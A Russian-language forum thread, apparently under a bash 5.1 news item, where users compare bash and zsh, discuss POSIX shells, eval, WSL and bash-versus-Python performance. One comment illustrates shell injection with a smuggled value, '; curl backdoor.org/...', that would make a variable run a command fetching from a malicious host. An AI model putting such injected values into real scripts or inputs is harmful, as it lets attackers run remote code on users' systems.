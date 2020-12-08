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|4.16, Аноним (16), 12:28, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Очень многие не сидят. У большинства моих знакомых венды дома нет, многим и по работе с ней пересекаться не приходится.
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|5.19, Аноним (16), 12:31, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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Лично у меня она есть, только в виртуалке. Нужно для работы, да и игрушечки не все пока на протоне идут. В принципе cmd.exe вполне достаточно для её скриптования, павершел же ничем не удобнее баша.
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|6.25, заминированный тапок (ok), 12:42, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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зато на Lutris идут гораздо больше, чем на протоне (и даже есть интеграция с коллекцией steam)
а играться в виртуальной машине - ну такое...
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|7.28, Аноним (16), 12:48, 08/12/2020 [^] [^^] [^^^] [ответить]
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Да не помню, когда запускал виртуалку ради игрушечек, вроде лет 5 назад. Тогда ещё dxvk никаких не было, какие-то лютые баги лезли. Но вообще, в QEMU то с проброшенной картой лучше чем с вендой на хосте работает, в dxvk всё же процентов на 10 ниже фреймрейт.
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|9.56, Аноним (16), 14:02, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
Для хоста нужна другая карта, у меня был отдельный монитор, но вроде можно и с о... текст свёрнут, показать
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|4.18, Аноним (18), 12:31, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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У меня нет окошек уже лет эдак 5 от слова совсем. До этого была XP в виртуалке для одной хитрой софтины.
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|3.31, Аноним (31), 13:14, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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>ну или что там сейчас ещё для 10 сделали
WSL2 для вас сделали. Так что вам тоже на bash переходить.
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|3.35, cjayho (?), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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ее и на венде особо не жалуют изза адских тормозов и переусложненности
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|2.6, Аноним (6), 12:07, 08/12/2020 [^] [^^] [^^^] [ответить]
|+5 +/–
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Что значит лучше? Это просто инструмент. Он либо подходит под твои задачи либо нет. Если не подходит, ищешь другой.
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|2.8, Аноним (16), 12:10, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Зшизмы заточены на комфортный интерактив (и куча плагинов комплектом соответственно тоже) и баш на скрипты, в значительной мере избавленные внешних вызовов. Он легче зш, но некоторые поведение в частности с пайпами и его ридлайн довольно своеобразное. Вроде я столкнулся с несовместимыми отличиями в глобах, сетопт и хэштейблах, из-за чего от поддержки зш в качестве интерпретатора пришлось отказаться. А кроме того, зш есть не каждой системе, и баш есть везде, поэтому если и брать зш, то только "для души".
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|5.76, Аноним (49), 14:39, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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И что? На один комп поставить можно, а на второй уже неподъёмная задача?
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|2.22, Аноним (22), 12:32, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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Тебе скрипты писать или просто дефолтный интерпретатор? Если первое, то лучше питона или руби ты не найдёшь. Если второе — оставайся на баш и не трогай, дабы не сломалось.
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|2.26, nomad__ (ok), 12:43, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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> Что всё-таки лучше для заурядного хомы: bash или zsh?
bash достаточно даже разрабу (как разраб говорю). Когда тебе понадобится zsh, ты об этом узнаешь.
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|2.36, лолшто (?), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]
|+2 +/–
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Если стратежно к вопросу подходить, то изучать следует то, что позволит твоему опыту быть более переносимым. В данном случае - это bash.
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|2.37, rshadow (ok), 13:22, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Если коротко: bash есть из коробки на каждом сервере, zsh если настроить то будет удобнее.
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|3.51, Аноним (49), 13:46, 08/12/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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Не на каждом. Даже не на каждом сервере с линуксом. И bash, и zsh — это хорошо, но надо уметь пользоваться POSIX shell.
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|4.55, 1 (??), 14:00, 08/12/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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вроде в любом линаксе sh - это просто hardlink на bash
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|5.67, Аноним (49), 14:20, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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Даже из мейнстримных дистров общего назначения — не в любом. В Debian-based и некоторых других это dash. Ежели дистр специализированный и урезанный, в нём может быть busybox с ash.
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|2.40, InuYasha (??), 13:24, 08/12/2020 [^] [^^] [^^^] [ответить]
|–3 +/–
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Пользую zsh уже с десяток лет. ЕДИНСТВЕННОЕ, чего в нём мне не хватает - поддержки оператора "==". Но это только в скриптах.
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|2.66, abu (?), 14:20, 08/12/2020 [^] [^^] [^^^] [ответить]
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Программисты ставят zsh на десктоп, пожалуй, это хорошо. А на сервер ... мне лично лень городить его на каждом сервере, хватает и bash'a.
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|1.23, Аноним (39), 12:36, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
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> 5.1
Вот она, программа здорового человека... ой, простите, человека без инвалидности!
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|2.30, Аноним (30), 13:08, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Что же у Вас тут за собрание "лучше-хуже"?
Чем колбаса хуже сосиски?
Разные они, вот и всё. Что больше нравится - тем и пользуйтесь.
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|2.33, Ordu (ok), 13:20, 08/12/2020 [^] [^^] [^^^] [ответить]
|+/–
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У zsh имя нечитаемое совершенно: "зш", ну что это? Как это читать?
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|4.58, Ordu (ok), 14:05, 08/12/2020 [^] [^^] [^^^] [ответить]
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> Вообще все его читают как "зэ - эс - аш".
Ну я о том же. Вынос мозга, а не название. гэцэцэ с гэдэбэ и то лучше.
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|5.71, IRASoldier_registered (ok), 14:26, 08/12/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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>гэцэцэ
Тяжкое наследие советской школы с повальным изучением немецкого вместо английского.
Так что "джи-си-си".
>гэдэбэ
"джи-ди-би", подсказывает Кэп.
>"зэ-эс-аш"
Хрена два. Общепринятое произношение - z[ee]sh / z[i]sh, т.е. "зиш". Баш и зиш, да.
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|1.32, Аноним (32), 13:15, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
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Баш вместе с линукс утилитками производительнее питона получается. И времени на код меньше уходит.
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|2.45, InuYasha (??), 13:28, 08/12/2020 [^] [^^] [^^^] [ответить]
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Только maximum дырявity, поскольку разделение данные-инструкции очень слабое - т.е. часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...".
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|3.52, Аноним (49), 13:49, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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> часто переменая может стать командой (если в неё запишут "; curl backdoor.org/...".
Это от криворукости. Разыменование переменной вне двойных кавычек бывает нужно крайне редко и только в тех случаях, когда ты сам эту переменную определил.
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|4.59, Аноним (16), 14:06, 08/12/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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Зато eval нужен очень часто, и ничего ты с этим не сделаешь.
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|6.75, Аноним (16), 14:34, 08/12/2020 [^] [^^] [^^^] [ответить]
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> нет не нужен
Наверно твои скрипты совершенно неконфигурируемая лапша из одного харкода, тогда конечно. При определённой сложности скриптов возникает желание предоставить пользователю возможность конфигурировать части логики в своём конфигурационном файле (а заодно избавиться от необходимости постоянно править хардкод). При том хочется его не насиловать его лишний раз, так что да, очень даже нужен.
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|7.77, Аноним (16), 14:39, 08/12/2020 [^] [^^] [^^^] [ответить]
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А, ещё eval на хештейблы натравливать очень удобно. Хештейблы на порядки удобней альтернатив, особенно когда у тебя неизвестно число параметров. Держать десятки списков в памяти, чтобы отказаться от хэштейблов? Ну, удачи это потом сопровождать.
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|5.79, Аноним (49), 14:42, 08/12/2020 [^] [^^] [^^^] [ответить]
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> eval нужен очень часто
Пишу много скриптов и со всей ответственностью могу сказать, что eval нужен крайне редко. Скорее всего, ты что-то не осилил и сильно усложняешь решение своих задач, если пользуешься им часто.
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|2.46, Аноним (16), 13:36, 08/12/2020 [^] [^^] [^^^] [ответить]
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До тех пор пока ты не начнёшь ежесекундно спамить тысячами процессов, да и с мультипоточностью пострадать придётся больше чем в питоне (там гил и гц мешают счастью).
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|3.61, Аноним (32), 14:08, 08/12/2020 [^] [^^] [^^^] [ответить]
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Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине
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|4.63, Аноним (16), 14:16, 08/12/2020 [^] [^^] [^^^] [ответить]
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> Для этого есть утилиты xargs и parallel, запускал больше тыщи на малине
Сколько тысяч процессов при этом вызывал каждый из тысячи процессов? А главное, сколько там было тредов? Когда большая часть времени исполнения уходит на паразитную нагрузку и "бесполезный" бойлерплейт (это что касается xargs и parallel), это всё же ощутимо.
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|5.65, Аноним (32), 14:19, 08/12/2020 [^] [^^] [^^^] [ответить]
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>Сколько тысяч процессов при этом вызывал каждый из тысячи процессов?
А питон так умеет?
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|6.72, Аноним (16), 14:27, 08/12/2020 [^] [^^] [^^^] [ответить]
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>>Сколько тысяч процессов при этом вызывал каждый из тысячи процессов?
> А питон так умеет?
С процессами без проблем, параллелится на сотни (это то что я проверял). С тредами потолок будет раньше, совсем плохо будет если использовать pure python батарейки — там вообще не параллелится практически. Дело как раз в том, что питону не придётся нонстоп вызывать сотни-тысячи программ и ждать их завершения, он сам всё может. А структуры его куда более дружелюбны для данных, вон в шелле даже многомерного массива нет и приходится городить очень неприятные конструкции не эффективные по памяти.
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|3.64, Аноним (32), 14:17, 08/12/2020 [^] [^^] [^^^] [ответить]
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Ещё бывает сами утилиты поддерживают параллельность, например sort и curl.
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|1.43, Аноним (43), 13:26, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]
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ребят, а где можно почитать гайды по posix-shell? ну т.е чтобы писать скрипты которые будут одинаково работать и под башем, и под zsh, и под чем угодно еще
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|2.53, Аноним (49), 13:54, 08/12/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Читай стандарт, тестируй скрипты в разных шеллах (как минимум dash и ksh). Самый надёжный способ.
Если для начального изучения, то на русском выходила книжка Кочана и Вуда, может быть, ещё найдёшь в продаже.
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|1.57, YetAnotherOnanym (ok), 14:05, 08/12/2020 [ответить] [﹢﹢﹢] [ · · · ]
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Понимаю, что выгляжу ретроградом, но весь этот улучшайзинг чреват обильными матюками, если в хозяйстве имеются машины с разными версиями скорлупы.
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